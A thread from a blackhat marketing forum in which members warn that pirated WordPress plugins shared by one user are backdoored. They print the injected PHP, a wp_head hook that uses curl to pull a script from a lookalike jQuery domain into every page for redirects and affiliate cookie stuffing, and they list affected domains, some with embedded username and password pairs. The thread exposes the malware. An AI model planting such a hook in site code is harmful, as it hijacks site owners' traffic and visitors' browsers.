Best Blackhat Forum

Full Version: [WARNING] Beware of site: blackhatilluminati.com and member named cyborgcod
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Lately this guy posted this thread and upon investigations, he found shitting or injecting some plugins on his shares.
Code:
http://bestblackhatforum.com/Thread-GET-Why-I-spent-2-240-on-this-WP-plugin-Your-visitors-will-like-you-more-and-buy-from-you-more


WARNING: DO NOT DOWNLOAD anything from cyborgcod's shares!!! It is F****** INFECTED guys!!!
Check all plugins you download from him and clean it!!!!

One of my friend told me this:
TZ Wrote:Whoever downloaded this plugin is getting redirected traffic from his site to some other site, where is filled with some java packed shit or affiliate codes.

This is not clean, code from UBHS script is injected.


Code:
$url = "http://www.j-query.info/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";



Recently I checked one other plugin on other forum and got source of actual links and affiliate signatures.

[Image: 2vtqwll.jpg]


affiliate links to hostgator and amazon.

[Image: 14smj42.jpg]



This username cyborgod must be some coincidence, right, cyborgod ?
TZ Wrote:I am not a coder of TB, I work php stuff and some jquery/ajax while TB is on coded for PC platform.
What exactly you want to say that I am involved here somehow, lol. Just for fun I gone through few of your last shares and plugins, all of them have same code and somebody could say that you know very well what I am talking about, ubhs script, affiliate cookie stuffing etc ... I can even pull statistic from one plugin download here

Code:
https://If you see this post "MARKED AS SPAM", please use the REPORT button, so we can ban this spammer./11Et5Vn+

and see all sites who installed plugin (that was amazon plugin) , I bet that many people here will see and recognize their sites and where is downloaded.


this code is in each of plugins, shared by you lately.
Its not on me to judge did you injected code or not, for me is clear that you did but that is just my opinion and who have to judge does not give a d***, so whatever.

Code:
function jqueryadd_head() {
    if(function_exists('curl_init'))
    {
        $url = "http://www.j-query.info/jquery-1.6.3.min.js";
        $ch = curl_init();  
        $timeout = 10;  
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);  
        curl_close($ch);
        echo "$data";
    }
}
add_action('wp_head', 'jqueryadd_head');


code found in all of those plugins

[GET][Rave reviews] (1300+ sold) WP Empire Builder. Launch and manage many blogs from 1 place. Closing soon

Code:
http://bestblackhatforum.com/Thread-GET-Rave-reviews-1300-sold-WP-Empire-Builder-Launch-manage-many-blogs-from-1-place-Closing-soon


-----------------

[GET]Azon Profit Poster - 440+ sold. (Rave reviews) WP plugin: More profitable Amazon blogs in just 2 mins (Closing soon)
Code:
http://bestblackhatforum.com/Thread-GET-Azon-Profit-Poster-440-sold-Rave-reviews-WP-plugin-More-profitable-Amazon-blogs-in-just-2-mins-Closing-soon

-----------------

[GET]CB Goliath WP Plugin
Code:
http://bestblackhatforum.com/Thread-GET-Associate-Goliath-Rave-reviews-2300-sold-Amazon-affiliate-blogs-in-3-mins-WP-plugin

------------------

[GET]LAUNCHING 12/02/2013! Ama Search Bar - Why I spent $2,350 on this WP plugin. More Amazon $$$ and traffic (Rave reviews)

Code:
http://bestblackhatforum.com/Thread-GET-LAUNCHING-12-02-2013-Ama-Search-Bar-Why-I-spent-2-350-on-this-WP-plugin-More-Amazon-and-traffic-Rave-reviews

---------------

[GET]Associate Goliath - [Rave reviews] (2300+ sold) - Amazon affiliate blogs in 3 mins. WP plugin

Code:
http://bestblackhatforum.com/Thread-GET-Associate-Goliath-Rave-reviews-2300-sold-Amazon-affiliate-blogs-in-3-mins-WP-plugin

--------------

Screens from statistics, in case that link get removed

[Image: 52kt9v.jpg]

[Image: 2j0fc7q.jpg]
TZ Wrote:domains referring to code from plugins, if somebody recognize their site, have to remove code.

Code:
canon7deos.com
valentineideas.only-for-u.com
www.asseenontvlovers.com
bealady.net
medical-beauty-center.com
cydneesremyhair.com
weddinginvitations.simpleweddingdecorati...
www.kittygear.net
www.thearticlesbase.com
houmous.net
restonhomebuyers.com
www.affirmwear.com
gaminghubstore.com
sex-and-toys.com
Email Clients, IM, AIR Apps, and Direct
www.rhythmclock.net
coolgiftsidea.com
www.getarticlestoday.com
onlinemoviestv.com
conradbedford.com
customerreviewsandratings.com
www.gamerblackbox.com
nordicnaturalsultimateomega.com
www.skeletonwatches.tk
fdating.org
www.alanmcleanpublishing.com
standmixertestde.org
makeshoppingonline.com
fastdietproducts.com
www.j-query.info
tenbestbargains.com
wordpress-seo.co
officialfacebuckgiveaways.com
thesoftwarestand.com
brydonjohnson.com
traderslocal.co.uk
newconsumerreports.com
speakerdock-sounddock10.3owl.com
marterognerud.com
affiliatemarketingreveal.com
daily50deals.com
www.bestcamerareviewsite.com
polaroidkameras.com
runningaccessoriescenter.com
thementalistcast.com
www.hafizfahmialdino.asia
wanduhr.x50x.net
bestsellingjewlery.com
127.0.0.1:4001
www.beekeepingbee.net
bestlaptop.bantul.asia
www.lanval.com
demo.sitokogrosir.com
www.aboutloans.info
toygames.coolgiftsidea.com
www.fdating.org
babystrollerjogger.id1945.com
dohamonster.com
f5life.us
multivitamins-for-men.com
videostore-online.com
www.flipgoldcoins.com
snapinmedia:bhu8nji9@www.thearticlesbase...
tablets.tenbestbargains.com
j-query.info
cerinefashion.com
mithatnetwork.com
purehealthandfitness.org
plazanetter.com
ebusiness.gituc.com
buynowz.com
mybursa:kidnis@www.thearticlesbase.com
www.product-reviews.asia
pricesaving5.info
amazon.black-projects.co.uk
search.daum.net
translate.googleusercontent.com
www.ozyburn.com
vivienemanuel.com
www.sex-and-toys.com
www.aboutloans.info.
savingstiger.org
fivekiwi.info
TZ Wrote:What a small world, looks like that someone have site on same server like you, this Illuminati thing



[Image: 2vty1k6.jpg]

[Image: vqr7k1.jpg]

[Image: 2581ddz.jpg]




Anyway, this is new link for stats, directly from
Code:
http://www.j-query.info/jquery-1.6.3.min.js

, going to

Code:
http://>>>[[[Reported by Members as URL Shortener! Post the actual link!]]]<<</gas5mj+



[Image: 2is8ldj.jpg]



and wow, man, this is not bad, 58,027 clicks on specific aff id... what a pitty its not yours, you could make a lot of money...



those are domains , installed plugin lately...

Code:
afm.re
    www.geekandjock.com
    pleaseeducate.us
    www.wheelchairboy.info
    www.cooney.com.au
    Email Clients, IM, AIR Apps, and Direct
    m.dotcomxp.com
    www.myrepairhelp.com
    www.rhythmclock.net
    www.kofc4387.org
    www.kittygear.net
    myinternetmarketingblog.com
    buying-advice.com
    im.idichvu.com
    www.taiwan-tvnet.com
    www.j-query.info
    canon7deos.com
    holidaytripadvisors.com
    mobilephonesignalbooster.org.uk
So all he said was lies, "Oh I did not know.. I got it from some other place" bullshit.. BAN
ban ban ban "Oh I did not know about that! I just shared it from another forum!"
(03-23-2013 09:28 AM)bassebuu Wrote: [ -> ]So all he said was lies, "Oh I did not know.. I got it from some other place" bullshit.. BAN
Yes. It was obvioulsy a one big big lie! This member who try to infect fellow members deserved to be ban!!!
What you guys think? he is bulshitting us!

His last Last Visit: (march 23,2013)
Today 01:30 AM


Let see if he will response on this thread and care to explain this shit he started.
From his cb goliath thread after I wrote that it was probably him who infected the plugins feb 10th. Here is his answer:

"Check your files you Download, Im not the source, but get them from an underground Forum i pay $99/month for!
VT Showed clean, so did my local AV/Malware tools. So manually checking every share is not an option for me.
If your that worried about every file, Please spend 5 minutes checking it. To me all files look normal !
No harm is ever intended, im here to be part of a great community! and thats it. "

It will be interesting to see what he answers this time...
yes this m-f is doing this shit in every forum, be careful guys he should be reported to his hosting service, amazon affiliates so they ban his ass...
thanks for the alert King of Marketing!

looks like bht already banned him
orig thread where he was found out:
Magic Button :
Code:
http://www.bestblackhatforum.com/f185/get-wp-stealth-note-why-i-spent-2-240-on-tmakes-your-visitors-like-you-more-gets-you-more-google-traffic-and-boosts-your-profits-in-just-1-minut-90889.html#post646819

Note: link hidden due to unsure if allowed to link to another forum
Pages: 1 2 3
Reference URL's